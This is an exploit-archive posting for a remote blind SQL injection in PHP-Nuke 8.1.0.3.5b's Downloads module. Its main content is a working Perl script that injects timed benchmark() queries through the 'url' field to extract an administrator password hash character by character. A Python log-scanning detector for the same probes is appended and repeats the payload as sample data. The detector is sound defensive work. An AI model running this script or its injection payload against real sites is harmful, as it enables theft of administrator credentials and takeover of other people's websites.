
PHP-Nuke 8.1.0.3.5b Downloads Remote Blind SQL Injection

Posted Nov 23, 2011
Authored by Dante90 | Site warwolfz.org

PHP-Nuke versions 8.1.0.3.5b and below remote blind SQL injection exploit.

tags | exploit, remote, php, sql injection
SHA-256 | 7cde33d09b6ccc42ca4062bdaa24da7a1f5dd385c5adba8ff2cb59d9519665f3

#!/usr/bin/perl
# [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploit
# Date: 2010.07.04 after 50 days the bug was discovered.
# Author/s: Dante90, WaRWolFz Crew
# Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770,
# Shades Master, V1R5, yeat
# Special Greetings To: The:Paradox
# Greetings To: Shotokan-The Hacker, _mRkZ_, h473
# Web Site: www.warwolfz.org
# My Wagend (Dante90): dante90wwz.altervista.org
# ----
# Why have I decided to publish this?
# Because some nice guys (Dr.0rYX and Cr3w-DZ) have ripped and published
# my own exploit, with their names.
# FUCKING LAMERS / RIPPERS / SCRIPT KIDDIE
# ----

use strict;
use warnings;

use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Headers;
use Time::HiRes;

my $Victime = shift or &usage;
my $Hash = "";
my ($Referer,$Time,$Response);
my ($Start,$End);
my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
my $Method = HTTP::Request->new(POST => $HostName.'modules.php?name=Downloads&d_op=Add');
my $Cookies = new HTTP::Cookies;
my $UserAgent = new LWP::UserAgent(
    agent => 'Mozilla/5.0',
    max_redirect => 0,
    cookie_jar => $Cookies,
    default_headers => HTTP::Headers->new,
) or die $!;
my $WaRWolFz = "http://www.warwolfz.org/";
my $DefaultTime = request($WaRWolFz);
my $Post;

sub Blind_SQL_Jnjection {
    my ($dec,$hex,$Victime) = @_;
    return "http://www.warwolfz.org/' UNION/**/SELECT IF(SUBSTRING(pwd,${dec},1)=CHAR(${hex}),benchmark(250000000,CHAR(0)),0) FROM nuke_authors WHERE aid='${Victime}";
}

for(my $I=1; $I<=32; $I++){ #N Hash characters
    for(my $J=0; $J<=15; $J++){ #0 -> F
        $Post = Blind_SQL_Jnjection($I,$chars[$J],$Victime);
        $Time = request($Post);
        sleep(3);
        refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I);
        if ($Time > 4) {
            $Time = request($Post);
            refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I);
            if ($Time > 4) {
                syswrite(STDOUT,chr($chars[$J]));
                $Hash .= chr($chars[$J]);
                $Time = request($Post);
                refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I);
                last;
            }
        }
    }
    if($I == 1 && length $Hash < 1 && !$Hash){
        print " * Exploit Failed *\n";
        print " -------------------------------------------------------- \n";
        exit;
    }
    if($I == 32){
        print " * Exploit Successfully Executed *\n";
        print " -------------------------------------------------------- \n";
        system("pause");
    }
}

sub request{
    $Post = $_[0];
    $Start = Time::HiRes::time();
    my $Response = $UserAgent->post($HostName.'modules.php?name=Downloads&d_op=Add', {
            title => "Dante90",
            url => $Post,
            description => "WaRWolFz Crew",
            auth_name => "Dante90",
            email => "dante90.dmc4\@hotmail.it",
            filesize => "1024",
            version => "1",
            homepage => "http://www.warwolfz.org/",
            d_op => "Add"
        },
        Referer => $HostName.'modules.php?name=Downloads&d_op=Add');
    $Response->is_success() or die "$HostName : ", $Response->message, "\n";
    $End = Time::HiRes::time();
    $Time = $End - $Start;
    return $Time;
}

sub usage {
    system("cls");
    {
        print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploit\n";
        print " -------------------------------------------------------- \n";
        print " * USAGE: *\n";
        print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
        print " * perl name_exploit.pl [victime] *\n";
        print " -------------------------------------------------------- \n";
        print " * Powered By Dante90, WaRWolFz Crew *\n";
        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
        print " ------------------------------------------------------- \n";
    };
    exit;
}

sub refresh {
    system("cls");
    {
        print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploit\n";
        print " -------------------------------------------------------- \n";
        print " * USAGE: *\n";
        print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
        print " * perl name_exploit.pl [victime] *\n";
        print " -------------------------------------------------------- \n";
        print " * Powered By Dante90, WaRWolFz Crew *\n";
        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
        print " ------------------------------------------------------- \n";
    };
    print " * Victime Site: " . $_[0] . "\n";
    print " * Default Time: " . $_[1] . " seconds\n";
    print " * BruteForcing Hash: " . chr($_[2]) . "\n";
    print " * BruteForcing N Char Hash: " . $_[5] . "\n";
    print " * SQL Time: " . $_[4] . " seconds\n";
    print " * Hash: " . $_[3] . "\n";
}

#WaRWolFz Crew
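
Detection logic for the request pattern the script above produces (POSTs to the Downloads `d_op=Add` form whose `url` field carries a `benchmark()` timing probe, with responses slower than the script's 4-second threshold), added here as an example and not part of the original posting. The tab-separated audit-log layout, the `record` and `scan` helpers, the rule names and the sample addresses are assumptions; the log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlencode, urlsplit

ENDPOINT = "/modules.php?name=Downloads&d_op=Add"
# The injected `url` value from the script above, with a placeholder account name.
PROBE = ("http://example.org/' UNION/**/SELECT IF(SUBSTRING(pwd,{pos},1)=CHAR({c}),"
         "benchmark(250000000,CHAR(0)),0) FROM nuke_authors WHERE aid='EXAMPLE")

def record(client, seconds, url_value):
    """Build one constructed audit-log line: client, method, URI, seconds, POST body."""
    body = urlencode({"title": "x", "url": url_value, "d_op": "Add"})
    return "\t".join([client, "POST", ENDPOINT, str(seconds), body])

SAMPLE_LOG = "\n".join([  # constructed sample data, not real traffic
    record("198.51.100.7", 0.21, "http://example.org/tool.zip"),
    record("203.0.113.9", 0.19, PROBE.format(pos=1, c=48)),
    record("203.0.113.9", 6.84, PROBE.format(pos=1, c=49)),
    record("203.0.113.9", 0.22, PROBE.format(pos=2, c=48)),
    "198.51.100.7\tGET\t/modules.php?name=Downloads\t0.05\t",
])

# Matched after SQL comments are stripped, so UNION/**/SELECT is still caught.
RULES = {
    "benchmark": re.compile(r"\bbenchmark\s*\("),
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "char-compare": re.compile(r"\bsubstring\s*\(.+?\)\s*=\s*char\s*\("),
}

def scan(log_text, slow_seconds=4.0):
    """Return per-client rule hits, probe count and slow-response count."""
    report = defaultdict(lambda: {"rules": set(), "requests": 0, "slow": 0})
    for line in log_text.splitlines():
        client, method, uri, seconds, body = line.split("\t")
        query = parse_qs(urlsplit(uri).query)
        if method != "POST" or query.get("name") != ["Downloads"] \
                or query.get("d_op") != ["Add"]:
            continue  # only the Downloads submission form is of interest
        field = " ".join(parse_qs(body).get("url", []))
        text = re.sub(r"/\*.*?\*/", " ", field).lower()
        hits = {name for name, rx in RULES.items() if rx.search(text)}
        if hits:
            entry = report[client]
            entry["rules"] |= hits
            entry["requests"] += 1
            entry["slow"] += float(seconds) > slow_seconds
    return dict(report)
```

A client with many flagged requests and only occasional slow responses matches the character-by-character guessing loop in the script.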